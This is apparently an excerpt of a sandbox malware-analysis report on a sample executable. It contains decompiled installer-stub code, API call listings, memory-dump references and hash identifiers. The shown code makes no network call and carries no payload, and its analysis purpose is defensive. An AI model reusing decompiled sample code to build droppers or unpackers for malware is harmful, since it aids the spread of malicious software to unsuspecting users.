                  										 *(__ebp - 0x50) = __edi;
                  									} else {
                  										 *(__ebp - 0x10) = __edx;
                  										0x800 = 0x800 - __ecx;
                  										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                  										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                  										 *__esi = __dx;
                  									}
                  									__eflags =  *(__ebp - 0x10) - 0x1000000;
                  									if( *(__ebp - 0x10) >= 0x1000000) {
                  										L111:
                  										_t368 = __ebp - 0x48;
                  										 *_t368 =  *(__ebp - 0x48) + 1;
                  										__eflags =  *_t368;
                  										goto L112;
                  									} else {
                  										goto L109;
                  									}
                  								}
                  								__ecx =  *(__ebp - 0xc);
                  								__ebx = __ebx + __ebx;
                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                  								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                  								 *(__ebp - 0x44) = __ebx;
                  								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                  									__ecx =  *(__ebp - 0x10);
                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                  									__ebx = __ebx | 0x00000001;
                  									__eflags = __ebx;
                  									 *(__ebp - 0x44) = __ebx;
                  								}
                  								__eflags =  *(__ebp - 0x10) - 0x1000000;
                  								if( *(__ebp - 0x10) >= 0x1000000) {
                  									L101:
                  									_t338 = __ebp - 0x48;
                  									 *_t338 =  *(__ebp - 0x48) - 1;
                  									__eflags =  *_t338;
                  									goto L102;
                  								} else {
                  									goto L99;
                  								}
                  							}
                  							__edx =  *(__ebp - 4);
                  							__eax = __eax - __ebx;
                  							 *(__ebp - 0x40) = __ecx;
                  							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                  							goto L108;
                  						case 0x1a:
                  							goto L55;
                  						case 0x1b:
                  							L75:
                  							__eflags =  *(__ebp - 0x64);
                  							if( *(__ebp - 0x64) == 0) {
                  								 *(__ebp - 0x88) = 0x1b;
                  								goto L170;
                  							}
                  							__eax =  *(__ebp - 0x14);
                  							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  							__eflags = __eax -  *(__ebp - 0x74);
                  							if(__eax >=  *(__ebp - 0x74)) {
                  								__eax = __eax +  *(__ebp - 0x74);
                  								__eflags = __eax;
                  							}
                  							__edx =  *(__ebp - 8);
                  							__cl =  *(__eax + __edx);
                  							__eax =  *(__ebp - 0x14);
                  							 *(__ebp - 0x5c) = __cl;
                  							 *(__eax + __edx) = __cl;
                  							__eax = __eax + 1;
                  							__edx = 0;
                  							_t274 = __eax %  *(__ebp - 0x74);
                  							__eax = __eax /  *(__ebp - 0x74);
                  							__edx = _t274;
                  							__eax =  *(__ebp - 0x68);
                  							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                  							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  							_t283 = __ebp - 0x64;
                  							 *_t283 =  *(__ebp - 0x64) - 1;
                  							__eflags =  *_t283;
                  							 *( *(__ebp - 0x68)) = __cl;
                  							goto L79;
                  						case 0x1c:
                  							while(1) {
                  								L123:
                  								__eflags =  *(__ebp - 0x64);
                  								if( *(__ebp - 0x64) == 0) {
                  									break;
                  								}
                  								__eax =  *(__ebp - 0x14);
                  								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  								__eflags = __eax -  *(__ebp - 0x74);
                  								if(__eax >=  *(__ebp - 0x74)) {
                  									__eax = __eax +  *(__ebp - 0x74);
                  									__eflags = __eax;
                  								}
                  								__edx =  *(__ebp - 8);
                  								__cl =  *(__eax + __edx);
                  								__eax =  *(__ebp - 0x14);
                  								 *(__ebp - 0x5c) = __cl;
                  								 *(__eax + __edx) = __cl;
                  								__eax = __eax + 1;
                  								__edx = 0;
                  								_t414 = __eax %  *(__ebp - 0x74);
                  								__eax = __eax /  *(__ebp - 0x74);
                  								__edx = _t414;
                  								__eax =  *(__ebp - 0x68);
                  								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                  								__eflags =  *(__ebp - 0x30);
                  								 *( *(__ebp - 0x68)) = __cl;
                  								 *(__ebp - 0x14) = __edx;
                  								if( *(__ebp - 0x30) > 0) {
                  									continue;
                  								} else {
                  									goto L80;
                  								}
                  							}
                  							 *(__ebp - 0x88) = 0x1c;
                  							goto L170;
                  					}
                  				}
                  			}













                  0x004066b5
                  0x00000000
                  0x004066b5
                  0x00406688
                  0x0040668b
                  0x0040668f
                  0x00406692
                  0x00406692
                  0x00406695
                  0x00000000
                  0x00000000
                  0x0040673f
                  0x00406743
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406768
                  0x0040676f
                  0x00406776
                  0x00406776
                  0x00000000
                  0x00406776
                  0x00406745
                  0x00406748
                  0x0040674b
                  0x0040674e
                  0x00406755
                  0x00406699
                  0x00406699
                  0x0040669c
                  0x00000000
                  0x00000000
                  0x00406830
                  0x00406833
                  0x00000000
                  0x00000000
                  0x0040646a
                  0x0040646c
                  0x00406473
                  0x00406474
                  0x00406476
                  0x00406479
                  0x00000000
                  0x00000000
                  0x00406481
                  0x00406484
                  0x00406487
                  0x00406489
                  0x0040648b
                  0x0040648b
                  0x0040648c
                  0x0040648f
                  0x00406496
                  0x00406499
                  0x004064a7
                  0x00000000
                  0x00000000
                  0x0040677d
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x00000000
                  0x00000000
                  0x0040678c
                  0x0040678c
                  0x00406790
                  0x004068c8
                  0x00000000
                  0x004068c8
                  0x00406796
                  0x00406799
                  0x0040679c
                  0x004067a0
                  0x004067a3
                  0x004067a9
                  0x004067ab
                  0x004067ab
                  0x004067ab
                  0x004067ae
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b4
                  0x004067b4
                  0x004067b8
                  0x00406818
                  0x0040681b
                  0x00406820
                  0x00406821
                  0x00406823
                  0x00406825
                  0x00406828
                  0x00000000
                  0x00406828
                  0x004067ba
                  0x004067c0
                  0x004067c3
                  0x004067c6
                  0x004067c9
                  0x004067cc
                  0x004067cf
                  0x004067d2
                  0x004067d5
                  0x004067d8
                  0x004067db
                  0x004067f4
                  0x004067f7
                  0x004067fa
                  0x004067fd
                  0x00406801
                  0x00406803
                  0x00406803
                  0x00406804
                  0x00406807
                  0x004067dd
                  0x004067dd
                  0x004067e5
                  0x004067ea
                  0x004067ec
                  0x004067ef
                  0x004067ef
                  0x0040680a
                  0x00406811
                  0x00000000
                  0x00406813
                  0x00000000
                  0x00406813
                  0x00000000
                  0x004064af
                  0x004064b2
                  0x004064e8
                  0x00406618
                  0x00406618
                  0x00406618
                  0x00406618
                  0x0040661b
                  0x0040661b
                  0x0040661e
                  0x00406620
                  0x004068aa
                  0x00000000
                  0x004068aa
                  0x00406626
                  0x00406629
                  0x00000000
                  0x00000000
                  0x0040662f
                  0x00406633
                  0x00406636
                  0x00406636
                  0x00406636
                  0x00000000
                  0x00406636
                  0x004064b4
                  0x004064b6
                  0x004064b8
                  0x004064ba
                  0x004064bd
                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004063bc
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x00000000
                  0x0040667d
                  0x0040667b
                  0x004068b0
                  0x00000000
                  0x00000000
                  0x00405edf

                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                  • Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
                  • Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                  • Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00405D7C(CHAR* _a4) {
                  				void* _t2;
                  
                  				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
                  				if(_t2 == 0xffffffff) {
                  					return 0;
                  				}
                  				FindClose(_t2);
                  				return 0x4224e8;
                  			}





                  APIs
                  • FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,747DF560,004053BE,?,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,747DF560), ref: 00405D87
                  • FindClose.KERNEL32(00000000), ref: 00405D93
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Find$CloseFileFirst
                  • String ID: $B
                  • API String ID: 2295610775-2366330246
                  • Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                  • Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
                  • Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                  • Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00405DA3(signed int _a4) {
                  				struct HINSTANCE__* _t5;
                  				CHAR* _t7;
                  				signed int _t9;
                  
                  				_t9 = _a4 << 3;
                  				_t7 =  *(_t9 + 0x409218);
                  				_t5 = GetModuleHandleA(_t7);
                  				if(_t5 != 0) {
                  					L2:
                  					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
                  				}
                  				_t5 = LoadLibraryA(_t7); // executed
                  				if(_t5 != 0) {
                  					goto L2;
                  				}
                  				return _t5;
                  			}







                  APIs
                  • GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                  • LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: AddressHandleLibraryLoadModuleProc
                  • String ID:
                  • API String ID: 310444273-0
                  • Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                  • Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
                  • Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                  • Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 108 4035e3-4035fb call 405da3 111 4035fd-40360d call 4059e3 108->111 112 40360f-403636 call 40596c 108->112 119 403659-403678 call 403897 call 405659 111->119 117 403638-403649 call 40596c 112->117 118 40364e-403654 lstrcatA 112->118 117->118 118->119 126 40367e-403683 119->126 127 4036ff-403707 call 405659 119->127 126->127 128 403685-4036a9 call 40596c 126->128 133 403715-40373a LoadImageA 127->133 134 403709-403710 call 405aa7 127->134 128->127 135 4036ab-4036ad 128->135 137 403740-403776 RegisterClassA 133->137 138 4037c9-4037d1 call 40140b 133->138 134->133 140 4036be-4036ca lstrlenA 135->140 141 4036af-4036bc call 4055a3 135->141 142 40377c-4037c4 SystemParametersInfoA CreateWindowExA 137->142 143 40388d 137->143 149 4037d3-4037d6 138->149 150 4037db-4037e6 call 403897 138->150 147 4036f2-4036fa call 405578 call 405a85 140->147 148 4036cc-4036da lstrcmpiA 140->148 141->140 142->138 145 40388f-403896 143->145 147->127 148->147 153 4036dc-4036e6 GetFileAttributesA 148->153 149->145 161 403864-40386c call 404ef5 150->161 162 4037e8-403805 ShowWindow LoadLibraryA 150->162 154 4036e8-4036ea 153->154 155 4036ec-4036ed call 4055bf 153->155 154->147 154->155 155->147 169 403886-403888 call 40140b 161->169 170 40386e-403874 161->170 163 403807-40380c LoadLibraryA 162->163 164 40380e-403820 GetClassInfoA 162->164 163->164 166 403822-403832 GetClassInfoA RegisterClassA 164->166 167 403838-403862 DialogBoxParamA call 40140b 164->167 166->167 167->145 169->143 170->149 172 40387a-403881 call 40140b 170->172 172->149
                  C-Code - Quality: 96%
                  			E004035E3() {
                  				intOrPtr _v4;
                  				intOrPtr _v8;
                  				int _v12;
                  				int _v16;
                  				char _v20;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				intOrPtr* _t20;
                  				void* _t28;
                  				void* _t30;
                  				int _t31;
                  				void* _t34;
                  				struct HINSTANCE__* _t37;
                  				int _t38;
                  				int _t42;
                  				char _t61;
                  				CHAR* _t63;
                  				signed char _t67;
                  				CHAR* _t78;
                  				intOrPtr _t80;
                  				CHAR* _t85;
                  
                  				_t80 =  *0x423eb0;
                  				_t20 = E00405DA3(6);
                  				_t87 = _t20;
                  				if(_t20 == 0) {
                  					_t78 = 0x420498;
                  					"1033" = 0x7830;
                  					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
                  					__eflags =  *0x420498;
                  					if(__eflags == 0) {
                  						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
                  					}
                  					lstrcatA("1033", _t78);
                  				} else {
                  					E004059E3("1033",  *_t20() & 0x0000ffff);
                  				}
                  				E00403897(_t75, _t87);
                  				_t84 = "C:\\Users\\engineer\\AppData\\Local\\Temp";
                  				 *0x423f20 =  *0x423eb8 & 0x00000020;
                  				if(E00405659(_t87, "C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
                  					L16:
                  					if(E00405659(_t95, _t84) == 0) {
                  						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
                  					}
                  					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
                  					 *0x423688 = _t28;
                  					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                  						L21:
                  						if(E0040140B(0) == 0) {
                  							_t30 = E00403897(_t75, __eflags);
                  							__eflags =  *0x423f40;
                  							if( *0x423f40 != 0) {
                  								_t31 = E00404EF5(_t30, 0);
                  								__eflags = _t31;
                  								if(_t31 == 0) {
                  									E0040140B(1);
                  									goto L33;
                  								}
                  								__eflags =  *0x42366c;
                  								if( *0x42366c == 0) {
                  									E0040140B(2);
                  								}
                  								goto L22;
                  							}
                  							ShowWindow( *0x420470, 5);
                  							_t37 = LoadLibraryA("RichEd20");
                  							__eflags = _t37;
                  							if(_t37 == 0) {
                  								LoadLibraryA("RichEd32");
                  							}
                  							_t85 = "RichEdit20A";
                  							_t38 = GetClassInfoA(0, _t85, 0x423640);
                  							__eflags = _t38;
                  							if(_t38 == 0) {
                  								GetClassInfoA(0, "RichEdit", 0x423640);
                  								 *0x423664 = _t85;
                  								RegisterClassA(0x423640);
                  							}
                  							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
                  							E0040140B(5);
                  							return _t42;
                  						}
                  						L22:
                  						_t34 = 2;
                  						return _t34;
                  					} else {
                  						_t75 =  *0x423ea0;
                  						 *0x423654 = _t28;
                  						_v20 = 0x624e5f;
                  						 *0x423644 = E00401000;
                  						 *0x423650 =  *0x423ea0;
                  						 *0x423664 =  &_v20;
                  						if(RegisterClassA(0x423640) == 0) {
                  							L33:
                  							__eflags = 0;
                  							return 0;
                  						}
                  						_t12 =  &_v16; // 0x624e5f
                  						SystemParametersInfoA(0x30, 0, _t12, 0);
                  						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
                  						goto L21;
                  					}
                  				} else {
                  					_t75 =  *(_t80 + 0x48);
                  					if(_t75 == 0) {
                  						goto L16;
                  					}
                  					_t78 = 0x422e40;
                  					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
                  					_t61 =  *0x422e40; // 0x6d
                  					if(_t61 == 0) {
                  						goto L16;
                  					}
                  					if(_t61 == 0x22) {
                  						_t78 = 0x422e41;
                  						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
                  					}
                  					_t63 = lstrlenA(_t78) + _t78 - 4;
                  					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
                  						L15:
                  						E00405A85(_t84, E00405578(_t78));
                  						goto L16;
                  					} else {
                  						_t67 = GetFileAttributesA(_t78);
                  						if(_t67 == 0xffffffff) {
                  							L14:
                  							E004055BF(_t78);
                  							goto L15;
                  						}
                  						_t95 = _t67 & 0x00000010;
                  						if((_t67 & 0x00000010) != 0) {
                  							goto L15;
                  						}
                  						goto L14;
                  					}
                  				}
                  			}


























                  APIs
                    • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                    • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                    • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                  • lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
                  • lstrlenA.KERNEL32(mcchdhqnu,?,?,?,mcchdhqnu,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\kVijllv0Yl.exe" ), ref: 004036BF
                  • lstrcmpiA.KERNEL32(?,.exe,mcchdhqnu,?,?,?,mcchdhqnu,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
                  • GetFileAttributesA.KERNEL32(mcchdhqnu), ref: 004036DD
                  • LoadImageA.USER32 ref: 00403726
                    • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                  • RegisterClassA.USER32 ref: 0040376D
                  • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
                  • CreateWindowExA.USER32 ref: 004037BE
                  • ShowWindow.USER32(00000005,00000000), ref: 004037F0
                  • LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
                  • LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
                  • GetClassInfoA.USER32 ref: 0040381C
                  • GetClassInfoA.USER32 ref: 00403829
                  • RegisterClassA.USER32 ref: 00403832
                  • DialogBoxParamA.USER32 ref: 00403851
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                  • String ID: "C:\Users\user\Desktop\kVijllv0Yl.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$mcchdhqnu
                  • API String ID: 914957316-114761464
                  • Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                  • Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
                  • Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                  • Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph (function 00402C5B; legend: Executed / Not Executed)
                  C-Code - Quality: 96%
                  			E00402C5B(void* __eflags, signed int _a4) {
                  				long _v8;
                  				long _v12;
                  				intOrPtr _v16;
                  				long _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				signed int _v40;
                  				char _v300;
                  				signed int _t54;
                  				void* _t57;
                  				void* _t62;
                  				intOrPtr _t65;
                  				void* _t68;
                  				intOrPtr* _t70;
                  				intOrPtr _t71;
                  				signed int _t77;
                  				signed int _t82;
                  				signed int _t83;
                  				signed int _t89;
                  				intOrPtr _t92;
                  				signed int _t101;
                  				signed int _t103;
                  				void* _t105;
                  				signed int _t106;
                  				signed int _t109;
                  				void* _t110;
                  
                  				_v8 = 0;
                  				_v12 = 0;
                  				 *0x423eac = GetTickCount() + 0x3e8;
                  				GetModuleFileNameA(0, "C:\\Users\\engineer\\Desktop\\kVijllv0Yl.exe", 0x400);
                  				_t105 = E0040575C("C:\\Users\\engineer\\Desktop\\kVijllv0Yl.exe", 0x80000000, 3);
                  				 *0x409010 = _t105;
                  				if(_t105 == 0xffffffff) {
                  					return "Error launching installer";
                  				}
                  				E00405A85("C:\\Users\\engineer\\Desktop", "C:\\Users\\engineer\\Desktop\\kVijllv0Yl.exe");
                  				E00405A85(0x42b000, E004055BF("C:\\Users\\engineer\\Desktop"));
                  				_t54 = GetFileSize(_t105, 0);
                  				__eflags = _t54;
                  				 *0x41f048 = _t54;
                  				_t109 = _t54;
                  				if(_t54 <= 0) {
                  					L22:
                  					E00402BC5(1);
                  					__eflags =  *0x423eb4;
                  					if( *0x423eb4 == 0) {
                  						goto L30;
                  					}
                  					__eflags = _v12;
                  					if(_v12 == 0) {
                  						L26:
                  						_t57 = GlobalAlloc(0x40, _v20); // executed
                  						_t110 = _t57;
                  						E00405E7D(0x40afb0);
                  						E0040578B( &_v300, "C:\\Users\\engineer\\AppData\\Local\\Temp\\"); // executed
                  						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                  						__eflags = _t62 - 0xffffffff;
                  						 *0x409014 = _t62;
                  						if(_t62 != 0xffffffff) {
                  							_t65 = E004031DA( *0x423eb4 + 0x1c);
                  							 *0x41f04c = _t65;
                  							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                  							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
                  							__eflags = _t68 - _v20;
                  							if(_t68 == _v20) {
                  								__eflags = _v40 & 0x00000001;
                  								 *0x423eb0 = _t110;
                  								 *0x423eb8 =  *_t110;
                  								if((_v40 & 0x00000001) != 0) {
                  									 *0x423ebc =  *0x423ebc + 1;
                  									__eflags =  *0x423ebc;
                  								}
                  								_t45 = _t110 + 0x44; // 0x44
                  								_t70 = _t45;
                  								_t101 = 8;
                  								do {
                  									_t70 = _t70 - 8;
                  									 *_t70 =  *_t70 + _t110;
                  									_t101 = _t101 - 1;
                  									__eflags = _t101;
                  								} while (_t101 != 0);
                  								_t71 =  *0x41703c; // 0x41e52
                  								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
                  								E0040571D(0x423ec0, _t110 + 4, 0x40);
                  								__eflags = 0;
                  								return 0;
                  							}
                  							goto L30;
                  						}
                  						return "Error writing temporary file. Make sure your temp folder is valid.";
                  					}
                  					E004031DA( *0x417038);
                  					_t77 = E004031A8( &_a4, 4); // executed
                  					__eflags = _t77;
                  					if(_t77 == 0) {
                  						goto L30;
                  					}
                  					__eflags = _v8 - _a4;
                  					if(_v8 != _a4) {
                  						goto L30;
                  					}
                  					goto L26;
                  				} else {
                  					do {
